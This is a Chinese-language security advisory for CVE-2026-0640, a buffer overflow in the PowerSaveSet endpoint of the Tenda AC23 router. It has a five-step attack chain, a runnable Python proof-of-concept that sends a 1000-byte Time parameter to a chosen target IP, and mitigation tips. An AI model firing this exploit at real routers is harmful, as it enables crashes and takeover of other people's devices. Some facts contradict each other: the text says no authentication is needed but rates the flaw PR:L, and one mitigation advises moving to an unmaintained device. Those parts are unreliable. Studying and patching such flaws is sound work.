Tenda AC23路由器PowerSaveSet缓冲区溢出漏洞（CVE-2026-0640）

漏洞信息

漏洞编号

CVE-2026-0640

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC23 16.03.07.52

漏洞概述

CVE-2026-0640是Tenda AC23路由器固件版本16.03.07.52中的一个高危缓冲区溢出漏洞。该漏洞存在于/goform/PowerSaveSet接口的sscanf函数中，攻击者可以通过构造恶意的Time参数远程触发该漏洞。由于sscanf函数在处理用户输入时未进行有效的边界检查，当传入超长的Time参数时会导致缓冲区溢出，覆盖相邻内存区域。攻击者可利用此漏洞在路由器上执行任意代码，获取设备完全控制权。该漏洞的CVSS评分为8.8，属于高危级别，攻击复杂度低且无需认证即可利用，公开的漏洞利用代码增加了实际攻击风险。

技术细节

该漏洞位于Tenda AC23路由器的Web管理接口中，具体在/goform/PowerSaveSet路由处理函数中。漏洞产生的根本原因是使用了不安全的sscanf函数从HTTP请求中读取Time参数，且未对输入长度进行限制。当用户提交包含超长字符串的Time参数时，sscanf函数会将数据写入固定大小的缓冲区中，导致缓冲区边界被突破。攻击者可以通过发送精心构造的HTTP POST请求，在Time参数中注入超过缓冲区容量的数据，触发栈缓冲区溢出。成功利用此漏洞可覆盖返回地址、函数指针等关键数据结构，最终实现远程代码执行。由于该接口通常无需认证即可访问（PR:L），且可通过网络远程触发（AV:N），使得漏洞利用门槛较低，危害严重。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标为Tenda AC23路由器，确认固件版本为16.03.07.52，并发现/goform/PowerSaveSet接口存在

STEP 2

步骤2：构造恶意请求

攻击者构造包含超长字符串的HTTP POST请求，Time参数中注入超过缓冲区容量的数据（通常需要1000+字节）

STEP 3

步骤3：触发缓冲区溢出

发送恶意请求到/goform/PowerSaveSet端点，sscanf函数在处理Time参数时未进行边界检查，导致缓冲区溢出

STEP 4

步骤4：覆盖关键内存

超长数据覆盖栈上的返回地址、寄存器值或其他关键数据结构，为后续代码执行创造条件

STEP 5

步骤5：执行任意代码

攻击者通过ROP链或直接跳转到注入的shellcode，执行任意命令，实现对路由器的完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-0640 PoC - Tenda AC23 Buffer Overflow in /goform/PowerSaveSet
# Target: Tenda AC23 router firmware 16.03.07.52
# Vulnerability: Buffer overflow via Time parameter in sscanf function

def exploit(target_ip, target_port=80):
    """
    Exploit buffer overflow in PowerSaveSet endpoint
    """
    url = f"http://{target_ip}:{target_port}/goform/PowerSaveSet"
    
    # Buffer overflow payload - 1000 bytes to overflow the buffer
    # Adjust payload size based on actual buffer size
    overflow_length = 1000
    payload = "A" * overflow_length
    
    # Construct malicious Time parameter
    data = {
        "Time": payload
    }
    
    try:
        print(f"[*] Sending exploit to {url}")
        print(f"[*] Payload length: {overflow_length} bytes")
        
        response = requests.post(url, data=data, timeout=10)
        
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response length: {len(response.text)}")
        
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit(target, port)

影响范围

Tenda AC23 16.03.07.52及之前版本

防御指南

临时缓解措施

在厂商发布修复固件之前，建议采取以下临时措施：1）禁用路由器的远程管理功能，仅允许通过本地网络访问管理界面；2）修改路由器默认管理员密码；3）启用防火墙规则，限制对80和443端口的外部访问；4）监控网络流量，及时发现异常请求模式；5）考虑更换为已停止维护的设备，或使用VPN建立安全通道访问管理界面。